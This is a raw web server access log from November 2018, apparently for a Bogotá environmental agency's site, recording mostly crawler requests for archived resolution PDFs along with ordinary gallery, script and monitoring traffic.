113.161.150.183 - - [10/Nov/2018:02:00:26 -0500] "GET /Autoliquidacion/TR%C3%81MITES%20MINER%C3%8DA/fileb455fcbda42846ba0de911039412432_html_27a4037bf344a6f9.jpg HTTP/1.1" 404 1099
113.161.150.183 - - [10/Nov/2018:02:00:26 -0500] "GET /Autoliquidacion/TR%C3%81MITES%20MINER%C3%8DA/fileb455fcbda42846ba0de911039412432_html_cdb7d4056ef140cb.png HTTP/1.1" 404 1099
113.161.150.183 - - [10/Nov/2018:02:00:26 -0500] "GET /Autoliquidacion/TR%C3%81MITES%20MINER%C3%8DA/fileb455fcbda42846ba0de911039412432_html_fd62a0e2cf748724.png HTTP/1.1" 404 1099
113.161.150.183 - - [10/Nov/2018:02:00:26 -0500] "GET /Autoliquidacion/TR%C3%81MITES%20MINER%C3%8DA/fileb455fcbda42846ba0de911039412432_html_3d8efd48210218dd.png HTTP/1.1" 404 1099
113.161.150.183 - - [10/Nov/2018:02:00:26 -0500] "GET /Autoliquidacion/TR%C3%81MITES%20MINER%C3%8DA/fileb455fcbda42846ba0de911039412432_html_b433770987817cf3.png HTTP/1.1" 404 1099
113.161.150.183 - - [10/Nov/2018:02:00:26 -0500] "GET /Autoliquidacion/TR%C3%81MITES%20MINER%C3%8DA/fileb455fcbda42846ba0de911039412432_html_6eb3afe328b50d3f.png HTTP/1.1" 404 1099
113.161.150.183 - - [10/Nov/2018:02:00:26 -0500] "GET /Autoliquidacion/TR%C3%81MITES%20MINER%C3%8DA/fileb455fcbda42846ba0de911039412432_html_20f205e5c414c4c2.png HTTP/1.1" 404 1099
66.249.69.105 - - [10/Nov/2018:02:00:49 -0500] "GET /BLA/resoluciones/Autos%202008/1972.pdf HTTP/1.1" 200 90468
66.249.69.105 - - [10/Nov/2018:02:00:55 -0500] "GET /BLA/resoluciones/Autos%202008/2928.pdf HTTP/1.1" 200 66244
66.249.69.105 - - [10/Nov/2018:02:02:13 -0500] "GET /BLA/resoluciones/AUTOS%202007/0431.pdf HTTP/1.1" 200 15810
194.67.207.94 - - [10/Nov/2018:02:02:38 -0500] "HEAD / HTTP/1.1" 200 -
194.67.210.77 - - [10/Nov/2018:02:02:38 -0500] "HEAD / HTTP/1.1" 200 -
66.249.69.107 - - [10/Nov/2018:02:03:10 -0500] "GET /portel_dama/libreria/php/2006/ECOSISTEMAS%20FINAL%20web_mz27/xxx%20humedales/sitio/22_pol/xtras/1.pdf HTTP/1.1" 404 1018
66.249.69.107 - - [10/Nov/2018:02:03:21 -0500] "GET /BLA/resoluciones/AUTOS%202011/6538.pdf HTTP/1.1" 200 212025
66.249.69.107 - - [10/Nov/2018:02:03:29 -0500] "GET /resoluciones/RESOLUCIONES%202009/0916.pdf HTTP/1.1" 404 1018
192.168.175.104 - - [10/Nov/2018:02:03:35 -0500] "GET / HTTP/1.1" 200 9990
66.249.69.105 - - [10/Nov/2018:02:03:56 -0500] "GET /BLA/resoluciones/AUTOS%202009/2696.pdf HTTP/1.1" 200 95355
192.168.175.104 - - [10/Nov/2018:02:03:56 -0500] "GET / HTTP/1.0" 200 9990
195.154.122.107 - - [10/Nov/2018:02:04:17 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
195.154.122.107 - - [10/Nov/2018:02:04:17 -0500] "GET /galeria/galeria/jquery.fancybox.js?v=2.1.5 HTTP/1.1" 200 48706
195.154.122.107 - - [10/Nov/2018:02:04:17 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
195.154.122.107 - - [10/Nov/2018:02:04:17 -0500] "GET /galeria/carrusel/Carrusel/jquery.thumbnailScroller.css HTTP/1.1" 200 2066
195.154.122.107 - - [10/Nov/2018:02:04:18 -0500] "GET /galeria/carrusel/Carrusel/jquery-ui-1.8.13.custom.min.js HTTP/1.1" 200 10800
195.154.122.107 - - [10/Nov/2018:02:04:19 -0500] "GET /galeria/carrusel/Carrusel/jquery.thumbnailScroller.js HTTP/1.1" 200 8157
195.154.122.107 - - [10/Nov/2018:02:04:19 -0500] "GET /galeria/nivo-slider/demo/demo.html HTTP/1.1" 200 17734
195.154.122.107 - - [10/Nov/2018:02:04:19 -0500] "GET /galeria/nivo-slider/themes/default/default.css HTTP/1.1" 200 1569
195.154.122.107 - - [10/Nov/2018:02:04:19 -0500] "GET /galeria/nivo-slider/themes/pascal/pascal.css HTTP/1.1" 200 2258
195.154.122.107 - - [10/Nov/2018:02:04:19 -0500] "GET /galeria/nivo-slider/themes/orman/orman.css HTTP/1.1" 200 2152
195.154.122.107 - - [10/Nov/2018:02:04:19 -0500] "GET /galeria/nivo-slider/nivo-slider.css HTTP/1.1" 200 1507
195.154.122.107 - - [10/Nov/2018:02:04:19 -0500] "GET /galeria/nivo-slider/demo/style.css HTTP/1.1" 200 2222
195.154.122.107 - - [10/Nov/2018:02:04:20 -0500] "GET /galeria/nivo-slider/jquery.nivo.slider.pack.js HTTP/1.1" 200 11561
195.154.122.107 - - [10/Nov/2018:02:04:20 -0500] "GET /galeria/nivo-slider/demo/scripts/jquery-1.7.1.min.js HTTP/1.1" 200 93868
66.249.69.105 - - [10/Nov/2018:02:04:21 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202010/5089.pdf HTTP/1.1" 200 690585
66.249.69.105 - - [10/Nov/2018:02:04:36 -0500] "GET /BLA/resoluciones/Autos%202008/1658.pdf HTTP/1.1" 200 246524
66.249.88.62 - - [10/Nov/2018:02:04:37 -0500] "GET /galeria/galeria/fotos/Humedal-Santa-Mar%C3%ADa-del-Lago1G.jpg HTTP/1.1" 200 290867
54.36.149.96 - - [10/Nov/2018:02:04:42 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202006/RES%202006%201751-1800/00001770.tif HTTP/1.1" 200 199126
69.162.124.232 - - [10/Nov/2018:02:04:56 -0500] "HEAD / HTTP/1.1" 200 -
66.249.69.6 - - [10/Nov/2018:02:05:16 -0500] "GET / HTTP/1.1" 200 9990
66.249.69.105 - - [10/Nov/2018:02:05:35 -0500] "GET /resoluciones/RESOLUCIONES%202007/RES%202007%203901%20AL%204000/RESOLUCION%203984%20DE%202007.pdf HTTP/1.1" 404 1018
66.249.69.105 - - [10/Nov/2018:02:05:57 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202010/5830.pdf HTTP/1.1" 200 602632
66.249.69.105 - - [10/Nov/2018:02:06:01 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202011/1805.pdf HTTP/1.1" 200 514764
66.249.69.107 - - [10/Nov/2018:02:06:04 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202007/RES%202007%202401%20AL%202500/RESOLUCION%202463%20%20DE%202007.pdf HTTP/1.1" 200 175549
66.249.69.109 - - [10/Nov/2018:02:06:07 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202011/2553.pdf HTTP/1.1" 200 262527
66.249.69.99 - - [10/Nov/2018:02:06:07 -0500] "GET /robots.txt HTTP/1.1" 404 1018
66.249.69.96 - - [10/Nov/2018:02:06:10 -0500] "GET /portel_dama/libreria/php/2006/ECOSISTEMAS%20FINAL%20web_mz27/restauracion/sitio/22_proye/xtras_in/4.pdf HTTP/1.1" 404 1018
66.249.69.105 - - [10/Nov/2018:02:06:11 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202011/1294.pdf HTTP/1.1" 200 257752
191.109.246.93 - - [10/Nov/2018:02:06:35 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
191.109.246.93 - - [10/Nov/2018:02:06:35 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
191.109.246.93 - - [10/Nov/2018:02:06:35 -0500] "GET /galeria/galeria/jquery.fancybox.js?v=2.1.5 HTTP/1.1" 200 48706
66.249.69.105 - - [10/Nov/2018:02:06:41 -0500] "GET /BLA/resoluciones/AUTOS%202011/5217.pdf HTTP/1.1" 200 312693
66.249.69.105 - - [10/Nov/2018:02:06:42 -0500] "GET /resoluciones/RESOLUCIONES%202008/2736.pdf HTTP/1.1" 404 1018
66.249.69.105 - - [10/Nov/2018:02:06:51 -0500] "GET /BLA/resoluciones/AUTOS%202014/0990.pdf HTTP/1.1" 200 292484
66.249.75.211 - - [10/Nov/2018:02:07:06 -0500] "GET /portel_dama/libreria/php/2006/ECOSISTEMAS%20FINAL%20web_mz27/x%20restauracion/sitio/22_proye/xtras_in/4.pdf HTTP/1.1" 404 1019
66.249.75.209 - - [10/Nov/2018:02:07:06 -0500] "GET /robots.txt HTTP/1.1" 404 1019
66.249.75.199 - - [10/Nov/2018:02:07:16 -0500] "GET /dama/libreria/pdf/polti_humedales_.pdf HTTP/1.1" 404 1019
66.249.69.105 - - [10/Nov/2018:02:07:20 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202011/1684.pdf HTTP/1.1" 200 273015
66.102.6.188 - - [10/Nov/2018:02:07:20 -0500] "-" 408 -
66.249.69.105 - - [10/Nov/2018:02:07:25 -0500] "GET /BLA/resoluciones/AUTOS%202012/1278.pdf HTTP/1.1" 200 273934
66.102.6.186 - - [10/Nov/2018:02:07:26 -0500] "-" 408 -
66.102.6.188 - - [10/Nov/2018:02:07:26 -0500] "-" 408 -
66.102.6.186 - - [10/Nov/2018:02:07:26 -0500] "-" 408 -
66.102.6.188 - - [10/Nov/2018:02:07:26 -0500] "-" 408 -
66.102.6.188 - - [10/Nov/2018:02:07:26 -0500] "-" 408 -
66.102.6.186 - - [10/Nov/2018:02:07:26 -0500] "-" 408 -
66.102.6.188 - - [10/Nov/2018:02:07:26 -0500] "-" 408 -
66.102.6.188 - - [10/Nov/2018:02:07:32 -0500] "-" 408 -
66.102.6.186 - - [10/Nov/2018:02:07:33 -0500] "-" 408 -
66.102.6.184 - - [10/Nov/2018:02:07:33 -0500] "-" 408 -
66.102.6.184 - - [10/Nov/2018:02:07:33 -0500] "-" 408 -
66.102.6.184 - - [10/Nov/2018:02:07:33 -0500] "-" 408 -
66.249.69.105 - - [10/Nov/2018:02:07:38 -0500] "GET /BLA/resoluciones/AUTOS%202012/2214.pdf HTTP/1.1" 200 375184
66.102.6.188 - - [10/Nov/2018:02:07:40 -0500] "-" 408 -
66.102.6.184 - - [10/Nov/2018:02:07:40 -0500] "-" 408 -
66.249.69.105 - - [10/Nov/2018:02:07:45 -0500] "GET /resoluciones/RESOLUCIONES%202009/0082.pdf HTTP/1.1" 404 1018
66.249.69.105 - - [10/Nov/2018:02:07:55 -0500] "GET /BLA/resoluciones/AUTOS%202012/0999.pdf HTTP/1.1" 200 267865
66.249.75.209 - - [10/Nov/2018:02:08:16 -0500] "GET /catalogoisis/Js/CriterioDiccionario.js HTTP/1.1" 200 608
66.249.75.209 - - [10/Nov/2018:02:08:16 -0500] "GET /catalogoisis/Js/Diccionario.js HTTP/1.1" 200 999
66.249.75.209 - - [10/Nov/2018:02:08:18 -0500] "GET /catalogoisis/Js/LimpiarDiccionario.js HTTP/1.1" 200 98
66.249.69.105 - - [10/Nov/2018:02:08:24 -0500] "GET /BLA/resoluciones/AUTOS%202012/0826.pdf HTTP/1.1" 200 334148
66.249.69.105 - - [10/Nov/2018:02:08:26 -0500] "GET /BLA/resoluciones/AUTOS%202009/2294.pdf HTTP/1.1" 200 221628
207.46.13.210 - - [10/Nov/2018:02:08:27 -0500] "GET / HTTP/1.1" 200 9990
192.168.175.104 - - [10/Nov/2018:02:08:32 -0500] "GET / HTTP/1.1" 200 9990
66.249.69.105 - - [10/Nov/2018:02:08:32 -0500] "GET /BLA/resoluciones/AUTOS%202009/2213.pdf HTTP/1.1" 200 114718
66.249.69.105 - - [10/Nov/2018:02:08:53 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202007/RES%202007%202101%20AL%202200/RESOLUCION%202150%20DE%202007.pdf HTTP/1.1" 200 564507
192.168.175.104 - - [10/Nov/2018:02:08:54 -0500] "GET / HTTP/1.0" 200 9990
66.249.69.107 - - [10/Nov/2018:02:08:58 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202013/2119.pdf HTTP/1.1" 200 450631
66.249.69.107 - - [10/Nov/2018:02:09:03 -0500] "GET /BLA/resoluciones/AUTOS%202012/0981.pdf HTTP/1.1" 200 166566
66.249.69.107 - - [10/Nov/2018:02:09:05 -0500] "GET /BLA/resoluciones/AUTOS%202017/2267.pdf HTTP/1.1" 200 366465
181.65.16.35 - - [10/Nov/2018:02:09:07 -0500] "GET /galeria/galeria/fotos/Huemdal-Cordoba2G.jpg HTTP/1.1" 200 471832
66.249.69.105 - - [10/Nov/2018:02:09:12 -0500] "GET /BLA/resoluciones/AUTOS%202009/1776.pdf HTTP/1.1" 200 97571
208.80.194.29 - - [10/Nov/2018:02:09:17 -0500] "GET /galeria/nivo-slider/demo/demo.html HTTP/1.0" 200 17734
66.249.69.105 - - [10/Nov/2018:02:09:21 -0500] "GET /resoluciones/RESOLUCIONES%202008/1691.pdf HTTP/1.1" 404 1018
69.162.124.232 - - [10/Nov/2018:02:09:56 -0500] "HEAD / HTTP/1.1" 200 -
178.93.13.3 - - [10/Nov/2018:02:10:04 -0500] "GET / HTTP/1.1" 200 9990
66.249.69.105 - - [10/Nov/2018:02:11:27 -0500] "GET /portel_dama/libreria/php/2006/ECOSISTEMAS%20FINAL%20web_mz27/restauracion/sitio/22_proye/xtras_in/cni_3.pdf HTTP/1.1" 404 1018
66.249.69.109 - - [10/Nov/2018:02:11:35 -0500] "GET /portel_dama/libreria/php/2006/restauracion/22_proye/xtras_in/4.pdf HTTP/1.1" 404 1018
66.249.69.105 - - [10/Nov/2018:02:11:47 -0500] "GET /BLA/resoluciones/AUTOS%202009/3412.pdf HTTP/1.1" 200 96397
66.249.69.109 - - [10/Nov/2018:02:11:52 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202007/RES%202007%201101%20AL%201200/RESOLUCION%201114%20DE%202007.pdf HTTP/1.1" 200 232969
66.249.69.107 - - [10/Nov/2018:02:12:03 -0500] "GET /BLA/resoluciones/AUTOS%202016/2065.pdf HTTP/1.1" 200 485943
66.249.75.213 - - [10/Nov/2018:02:12:08 -0500] "GET /portel_dama/libreria/php/2006/ECOSISTEMAS%20FINAL%20web_mz27/xxx%20humedales/sitio/22_pol/xtras/1.pdf HTTP/1.1" 404 1019
66.249.69.105 - - [10/Nov/2018:02:12:15 -0500] "GET /BLA/resoluciones/AUTOS%202014/2040.pdf HTTP/1.1" 200 342221
66.249.69.107 - - [10/Nov/2018:02:12:18 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202014/1064.pdf HTTP/1.1" 200 496111
66.249.69.105 - - [10/Nov/2018:02:12:20 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202007/RES%202007%20601%20AL%20700/RESOLUCION%200611%20DE%202007.pdf HTTP/1.1" 200 1016251
66.249.69.105 - - [10/Nov/2018:02:12:23 -0500] "GET /resoluciones/RESOLUCIONES%202009/1335.pdf HTTP/1.1" 404 1018
66.249.69.105 - - [10/Nov/2018:02:12:25 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202010/5386.pdf HTTP/1.1" 200 179974
66.249.69.105 - - [10/Nov/2018:02:12:27 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202010/5733.pdf HTTP/1.1" 200 82518
66.249.69.107 - - [10/Nov/2018:02:12:35 -0500] "GET /BLA/resoluciones/AUTOS%202007/0664.pdf HTTP/1.1" 200 70706
66.249.75.209 - - [10/Nov/2018:02:12:38 -0500] "GET /portel_dama/libreria/php/2006/ECOSISTEMAS%20FINAL%20web_mz27/humedales/sitio/22_pol/xtras/1.pdf HTTP/1.1" 404 1019
66.249.69.109 - - [10/Nov/2018:02:12:40 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202015/1187.pdf HTTP/1.1" 200 753226
66.249.69.105 - - [10/Nov/2018:02:13:04 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202007/RES%202007%20801%20AL%20900/RESOLUCION%200884%20DE%202007.pdf HTTP/1.1" 200 251264
179.51.112.18 - - [10/Nov/2018:02:13:23 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
179.51.112.18 - - [10/Nov/2018:02:13:23 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
179.51.112.18 - - [10/Nov/2018:02:13:23 -0500] "GET /galeria/galeria/jquery.fancybox.js?v=2.1.5 HTTP/1.1" 200 48706
192.168.175.104 - - [10/Nov/2018:02:13:30 -0500] "GET / HTTP/1.1" 200 9990
66.249.69.107 - - [10/Nov/2018:02:13:38 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202010/7054.pdf HTTP/1.1" 200 259887
66.249.69.107 - - [10/Nov/2018:02:13:41 -0500] "GET /portel_dama/libreria/php/2006/ECOSISTEMAS%20FINAL%20web_mz27/x%20restauracion/sitio/22_proye/xtras_in/2a.pdf HTTP/1.1" 404 1018
66.249.69.109 - - [10/Nov/2018:02:13:45 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202010/6939.pdf HTTP/1.1" 200 525886
66.249.69.105 - - [10/Nov/2018:02:13:52 -0500] "GET /BLA/resoluciones/AUTOS%202012/0907.pdf HTTP/1.1" 200 412006
192.168.175.104 - - [10/Nov/2018:02:13:52 -0500] "GET / HTTP/1.0" 200 9990
66.249.69.107 - - [10/Nov/2018:02:13:57 -0500] "GET /BLA/resoluciones/AUTOS%202012/2231.pdf HTTP/1.1" 200 154722
66.249.69.111 - - [10/Nov/2018:02:13:59 -0500] "GET /resoluciones/RESOLUCIONES%202008/2939.pdf HTTP/1.1" 404 1018
66.249.69.107 - - [10/Nov/2018:02:14:11 -0500] "GET /BLA/resoluciones/AUTOS%202012/2212.pdf HTTP/1.1" 200 325790
66.249.75.209 - - [10/Nov/2018:02:14:21 -0500] "GET /portel_dama/libreria/php/2006/ECOSISTEMAS%20FINAL%20web_mz27/restauracion/sitio/22_proye/xtras_in/2a.pdf HTTP/1.1" 404 1019
66.249.69.105 - - [10/Nov/2018:02:14:23 -0500] "GET /BLA/resoluciones/AUTOS%202009/2261.pdf HTTP/1.1" 200 123054
66.249.69.107 - - [10/Nov/2018:02:14:24 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202011/3616.pdf HTTP/1.1" 200 511510
181.55.7.164 - - [10/Nov/2018:02:14:32 -0500] "GET /BLA/resoluciones/AUTOS%202015/0621.pdf HTTP/1.1" 200 608570
181.55.7.164 - - [10/Nov/2018:02:14:32 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
66.249.69.105 - - [10/Nov/2018:02:14:38 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202011/4483.pdf HTTP/1.1" 200 350201
69.162.124.232 - - [10/Nov/2018:02:14:56 -0500] "HEAD / HTTP/1.1" 200 -
66.249.69.105 - - [10/Nov/2018:02:14:57 -0500] "GET /BLA/resoluciones/AUTOS%202007/1919.pdf HTTP/1.1" 200 90400
201.245.192.253 - - [10/Nov/2018:02:13:37 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 14746
201.245.192.253 - - [10/Nov/2018:02:14:37 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 20535
66.249.69.107 - - [10/Nov/2018:02:15:10 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202010/6806.pdf HTTP/1.1" 200 285385
66.249.69.107 - - [10/Nov/2018:02:15:13 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202011/1129.pdf HTTP/1.1" 200 295274
66.249.69.107 - - [10/Nov/2018:02:15:15 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202011/1865.pdf HTTP/1.1" 200 515381
66.249.69.107 - - [10/Nov/2018:02:15:22 -0500] "GET /BLA/resoluciones/AUTOS%202010/1400.pdf HTTP/1.1" 200 253409
66.249.69.105 - - [10/Nov/2018:02:15:24 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202011/3538.pdf HTTP/1.1" 200 655492
54.36.149.74 - - [10/Nov/2018:02:15:28 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202005/RES%202005%201351-1400/00001395.tif HTTP/1.1" 200 111254
66.249.69.109 - - [10/Nov/2018:02:15:30 -0500] "GET /BLA/resoluciones/Autos%202008/0415.pdf HTTP/1.1" 200 310740
216.244.66.197 - - [10/Nov/2018:02:15:34 -0500] "GET /robots.txt HTTP/1.1" 404 1019
66.249.69.111 - - [10/Nov/2018:02:15:35 -0500] "GET /BLA/resoluciones/AUTOS%202009/0925.pdf HTTP/1.1" 200 121498
66.249.69.105 - - [10/Nov/2018:02:15:39 -0500] "GET /BLA/resoluciones/AUTOS%202010/1397.pdf HTTP/1.1" 200 245542
66.249.69.105 - - [10/Nov/2018:02:15:49 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202010/6088.pdf HTTP/1.1" 200 683394
66.249.69.105 - - [10/Nov/2018:02:16:14 -0500] "GET /portel_dama/libreria/php/2006/ECOSISTEMAS%20FINAL%20web_mz27/restauracion/sitio/55_artic/xtras/2.pdf HTTP/1.1" 404 1018
66.249.69.105 - - [10/Nov/2018:02:16:25 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202010/6854.pdf HTTP/1.1" 200 1032482
165.132.5.146 - - [10/Nov/2018:02:17:07 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
66.249.69.109 - - [10/Nov/2018:02:17:09 -0500] "GET /BLA/resoluciones/AUTOS%202009/0233.pdf HTTP/1.1" 200 117091
165.132.5.146 - - [10/Nov/2018:02:17:10 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
165.132.5.146 - - [10/Nov/2018:02:17:11 -0500] "GET /galeria/galeria/jquery.fancybox.js?v=2.1.5 HTTP/1.1" 200 48706
207.46.13.31 - - [10/Nov/2018:02:17:21 -0500] "GET /BLA/boletinlegal/jurisprudencia/analisis/Analisis%20Sentencia%20T-1077,%202%20corregida.doc HTTP/1.1" 200 47616
66.249.69.105 - - [10/Nov/2018:02:17:32 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202010/6281.pdf HTTP/1.1" 200 74882
66.249.69.96 - - [10/Nov/2018:02:17:36 -0500] "GET /portel_dama/libreria/php/2006/ECOSISTEMAS%20FINAL%20web_mz27/x%20restauracion/sitio/55_artic/xtras/10.pdf HTTP/1.1" 404 1018
66.249.69.107 - - [10/Nov/2018:02:17:51 -0500] "GET /BLA/resoluciones/AUTOS%202012/0832.pdf HTTP/1.1" 200 307538
66.249.69.107 - - [10/Nov/2018:02:18:00 -0500] "GET /BLA/resoluciones/AUTOS%202009/0719.pdf HTTP/1.1" 200 215113
66.249.69.126 - - [10/Nov/2018:02:18:13 -0500] "GET /portel_dama/libreria/php/2006/ECOSISTEMAS%20FINAL%20web_mz27/restauracion/sitio/22_proye/xtras_in/3a.pdf HTTP/1.1" 404 1018
66.249.69.105 - - [10/Nov/2018:02:18:26 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202011/1268.pdf HTTP/1.1" 200 271466
192.168.175.104 - - [10/Nov/2018:02:18:28 -0500] "GET / HTTP/1.1" 200 9990
66.249.69.105 - - [10/Nov/2018:02:18:28 -0500] "GET /BLA/resoluciones/Autos%202008/0101.pdf HTTP/1.1" 200 157633
66.249.69.105 - - [10/Nov/2018:02:18:31 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202011/1866.pdf HTTP/1.1" 200 517576
66.249.69.105 - - [10/Nov/2018:02:18:42 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202010/5336.pdf HTTP/1.1" 200 316874
66.249.69.105 - - [10/Nov/2018:02:18:49 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202011/3133.pdf HTTP/1.1" 200 67447
192.168.175.104 - - [10/Nov/2018:02:18:51 -0500] "GET / HTTP/1.0" 200 9990
66.249.69.107 - - [10/Nov/2018:02:19:13 -0500] "GET /BLA/resoluciones/Autos%202008/0862.pdf HTTP/1.1" 200 136950
66.249.69.107 - - [10/Nov/2018:02:19:37 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202011/5794.pdf HTTP/1.1" 200 495227
66.249.69.105 - - [10/Nov/2018:02:19:39 -0500] "GET /BLA/resoluciones/AUTOS%202009/1363.pdf HTTP/1.1" 200 131206
69.162.124.232 - - [10/Nov/2018:02:19:56 -0500] "HEAD / HTTP/1.1" 200 -
66.249.69.105 - - [10/Nov/2018:02:20:04 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202010/6432.pdf HTTP/1.1" 200 533275
74.6.168.148 - - [10/Nov/2018:02:20:05 -0500] "GET /robots.txt HTTP/1.1" 404 1018
74.6.168.148 - - [10/Nov/2018:02:20:05 -0500] "GET /galeria/galeria/jquery.fancybox.js?v=2.1.5 HTTP/1.1" 200 48706
74.6.168.148 - - [10/Nov/2018:02:20:05 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 304 -
74.6.168.148 - - [10/Nov/2018:02:20:05 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 304 -
66.249.69.105 - - [10/Nov/2018:02:20:35 -0500] "GET /BLA/resoluciones/AUTOS%202016/0048.pdf HTTP/1.1" 200 822626
173.252.87.15 - - [10/Nov/2018:02:20:40 -0500] "GET / HTTP/1.1" 206 9990
207.46.13.210 - - [10/Nov/2018:02:20:44 -0500] "GET /BLA/boletinlegal/images/img_1.jpg HTTP/1.1" 200 8067
66.249.69.105 - - [10/Nov/2018:02:20:49 -0500] "GET /resoluciones/RESOLUCIONES%202008/3449.pdf HTTP/1.1" 404 1018
66.249.69.105 - - [10/Nov/2018:02:21:04 -0500] "GET /BLA/resoluciones/Autos%202008/2220.pdf HTTP/1.1" 200 57540
66.249.69.109 - - [10/Nov/2018:02:21:31 -0500] "GET /BLA/resoluciones/AUTOS%202014/1124.pdf HTTP/1.1" 200 362344
66.249.69.105 - - [10/Nov/2018:02:21:46 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202011/0098.pdf HTTP/1.1" 200 444649
54.36.149.12 - - [10/Nov/2018:02:22:30 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202004/RES%202004%202251-2300/00002267.tif HTTP/1.1" 200 149684
66.249.75.18 - - [10/Nov/2018:02:22:30 -0500] "GET /robots.txt HTTP/1.1" 404 1035
66.249.75.17 - - [10/Nov/2018:02:22:30 -0500] "GET / HTTP/1.1" 200 9990
66.249.69.10 - - [10/Nov/2018:02:23:01 -0500] "GET /www.ambientebogota.gov.co/web/web-ninos/inicio HTTP/1.1" 404 1015
192.168.175.104 - - [10/Nov/2018:02:23:26 -0500] "GET / HTTP/1.1" 200 9990
66.249.69.105 - - [10/Nov/2018:02:23:33 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202011/1222.pdf HTTP/1.1" 200 509855
54.36.148.25 - - [10/Nov/2018:02:23:39 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202006/RES%202006%202351-2400/00002400.tif HTTP/1.1" 200 303806
192.168.175.104 - - [10/Nov/2018:02:23:49 -0500] "GET / HTTP/1.0" 200 9990
66.249.69.105 - - [10/Nov/2018:02:24:05 -0500] "GET /BLA/resoluciones/AUTOS%202010/1449.pdf HTTP/1.1" 200 196047
207.46.13.19 - - [10/Nov/2018:02:24:15 -0500] "GET /galeria/galeria/fotos/MeandrodelSay1G.jpg HTTP/1.1" 200 274377
201.245.192.253 - - [10/Nov/2018:02:23:37 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 25050
69.162.124.232 - - [10/Nov/2018:02:24:56 -0500] "HEAD / HTTP/1.1" 200 -
207.46.13.210 - - [10/Nov/2018:02:25:08 -0500] "GET /POT-2013/Cartografia/13_Est_Ordenam_D.pdf HTTP/1.1" 200 6417967
66.249.69.109 - - [10/Nov/2018:02:25:22 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202007/RES%202007%201401%20AL%201500/RESOLUCION%201489%20DE%202007.pdf HTTP/1.1" 200 357512
54.36.148.227 - - [10/Nov/2018:02:26:46 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202003/RES%202003%201501-1550/20031547.tif HTTP/1.1" 200 77208
66.249.69.105 - - [10/Nov/2018:02:26:54 -0500] "GET /BLA/resoluciones/AUTOS%202017/0109.pdf HTTP/1.1" 200 526451
66.249.69.105 - - [10/Nov/2018:02:27:27 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202011/1287.pdf HTTP/1.1" 200 356456
66.249.69.105 - - [10/Nov/2018:02:28:16 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202011/0845.pdf HTTP/1.1" 200 362234
207.46.13.19 - - [10/Nov/2018:02:28:18 -0500] "GET /galeria/galeria/fotos/Huemdal-el-Tunjo1G.jpg HTTP/1.1" 200 393262
192.168.175.104 - - [10/Nov/2018:02:28:24 -0500] "GET / HTTP/1.1" 200 9990
66.249.69.105 - - [10/Nov/2018:02:28:40 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202010/6957.pdf HTTP/1.1" 200 68399
192.168.175.104 - - [10/Nov/2018:02:28:47 -0500] "GET / HTTP/1.0" 200 9990
66.249.69.109 - - [10/Nov/2018:02:29:06 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202011/1062.pdf HTTP/1.1" 200 388201
66.249.69.105 - - [10/Nov/2018:02:29:12 -0500] "GET /BLA/resoluciones/AUTOS%202014/0131.pdf HTTP/1.1" 200 857016
66.249.69.105 - - [10/Nov/2018:02:29:14 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202011/1184.pdf HTTP/1.1" 200 373397
